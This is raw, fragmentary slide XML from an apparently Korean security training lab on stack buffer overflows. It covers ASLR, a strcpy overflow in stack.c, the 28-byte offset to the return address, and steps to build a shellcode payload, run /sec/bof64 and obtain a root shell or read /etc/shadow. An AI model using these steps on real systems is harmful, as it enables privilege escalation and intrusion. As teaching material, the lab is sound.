      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="229" name="직선 화살표 연결선 228">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A1410F67-E27A-47C9-9950-F69B963A9C38}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="228" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3719858" y="2991297"/>
            <a:ext cx="400840" cy="12991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0" name="직사각형 239">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2A0F921A-C462-4724-9038-A4185C0D06D0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7734535" y="4447410"/>
            <a:ext cx="769090" cy="92896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1" name="Picture 6" descr="가상머신에 윈도우7 설치하기! - YouTube">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D357B360-87AF-4CF1-A902-715CEA8CAA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7898048" y="4986297"/>
            <a:ext cx="340590" cy="289256"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="238" name="TextBox 237">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{979B9D4B-EF2F-4EE4-96EC-4B2AD1FD4835}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7708953" y="4694317"/>
            <a:ext cx="872726"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pic>
        <p:nvPicPr>
          <p:cNvPr id="129" name="Picture 10" descr="Microsoft Window Operating System, OS Software in Nehru Place, Delhi ,  Xpert Infotech | ID: 10905071197">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A64F1CE-2950-4803-BC25-03358DBB8E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5581" y="4592223"/>
            <a:ext cx="738379" cy="476590"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="243" name="TextBox 242">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D91ABBB4-80A4-464B-BA2A-2682249976B8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7561410" y="4213985"/>
            <a:ext cx="1157864" cy="246221"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>WSL2 docker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="131" name="Picture 12" descr="리눅스 종류] 리눅스는 왜 펭귄 로고를 사용할까? 우분투 리눅스 추천 [웹사이트제작 와플즈] : 네이버 블로그">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{336C1829-F79F-4784-B4F6-1335A65D8A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12781" y="4504760"/>
            <a:ext cx="328913" cy="196083"/>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직선 연결선 133">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{99485EF8-1D92-47B6-A4D3-9A500B45430C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7734535" y="4718170"/>
            <a:ext cx="769090" cy="0"/>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68D021B0-6A24-4B8D-9681-DA7A48547765}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8122415" y="5471181"/>
            <a:ext cx="888017" cy="246221"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>&lt;Host OS&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="136" name="직선 연결선 135">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{36DC5BCA-78ED-4682-BF96-FCA0D5FAA163}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="1029" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8493708" y="3738963"/>
            <a:ext cx="9917" cy="468962"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="28575">
            <a:solidFill>
              <a:srgbClr val="A6A6A6"/>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49890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/bof64</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 76">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A05B8A24-0AD6-437D-9E5E-16BC5C819A60}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="497114" y="1286850"/>
            <a:ext cx="4085971" cy="693420"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 78">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{87373DF7-8165-4254-A426-601E5AD83523}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="490528" y="2788920"/>
            <a:ext cx="4039489" cy="640080"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="2" name="표 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AF911AFB-14D1-43A0-92BB-DDE8EC1868EC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3937964049"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="497685" y="3540329"/>
          <a:ext cx="4932807" cy="2686495"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="4932807">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3879104180"/>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13004609"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="2335403">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제거된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아래의 경우</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>, 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권한으로 실행되므로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098530"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="50177" name="_x564840440">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FA46C84B-BAC3-469D-AFCB-A99AF393A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91" y="4314277"/>
            <a:ext cx="4691063" cy="1820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0">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6EA22538-687D-4085-8FE9-18C4C1EB9988}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId6"/>
          <a:srcRect l="1" t="9990" r="-122"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6310085" y="904875"/>
            <a:ext cx="4843690" cy="491774"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="5" name="표 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{47B8B31A-EFFF-45B0-9BAA-885DBA00D0F8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4085510080"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6308677" y="1523070"/>
          <a:ext cx="4589304" cy="4840394"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="4589304">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2128152829"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="229105">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="just" fontAlgn="base" latinLnBrk="1">
                        <a:lnSpc>
                          <a:spcPct val="160000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="900" b="1" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>[</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="900" b="1" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>참고</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="900" b="1" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>]</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" altLang="en-US" sz="900" kern="0" spc="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94365321"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="4122233">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="just" fontAlgn="base" latinLnBrk="1">
                        <a:lnSpc>
                          <a:spcPct val="160000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="9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900" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>이 활성화되면 스택에 있는 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="9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변수의 주소가 실행시마다 변경됨을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코드 영역의 주소는 바뀌지 않음을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900" kern="0" spc="0" dirty="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6801801"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="50179" name="_x564904520">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{018268F2-EA4E-4654-AC73-9D03699D047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90" b="886"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6376307" y="2253456"/>
            <a:ext cx="2763947" cy="3881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67871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확인을 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>위해 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>test </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>계정으로 변경</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>su</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> test </a:t>
            </a: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 이용 공격 수행</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/sec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/bof64 $(python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/etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/shadow </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>파일 내용 출력이 되지 않음을 확인</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 82">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4B975456-1230-4EEF-9616-8DA77ABFA245}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="480786" y="1296225"/>
            <a:ext cx="4907534" cy="1807337"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C61DB69B-C4ED-4FDF-8DE0-E8E414C60830}"/>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22821578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코드가 포함된 페이로드를 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>만드는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>exploit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루트 쉘을 획득하라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95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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="156741410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/stack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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>stack.c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>소스 파일 확인</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>$ vi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>stack.c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err="1"/>
              <a:t>bof</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>함수에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>함수 사용으로 인한 버퍼 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>오버플로우</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> 취약점이 존재함을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ojdump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stack </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>| more</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버퍼 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>시작으로부터</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> 복귀 주소 시작까지의 거리는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>28</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>바이트</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 62">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DBA8D715-5190-4363-ADE3-5ED45E7A1552}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect l="725" t="9793" r="1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="547007" y="1325678"/>
            <a:ext cx="4953262" cy="394784"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 64">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{51745194-F882-49F5-84C8-35FB497B0ED1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="547007" y="2386554"/>
            <a:ext cx="5012436" cy="2804795"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 66">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{62AC64D9-E07F-4522-A4F9-5985CFEB7915}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5"/>
          <a:srcRect t="1" r="-30" b="50027"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6285593" y="475692"/>
            <a:ext cx="4948464" cy="1442916"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="2" name="표 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A388A016-BAFF-492D-AA4E-0F78C665F132}"/>
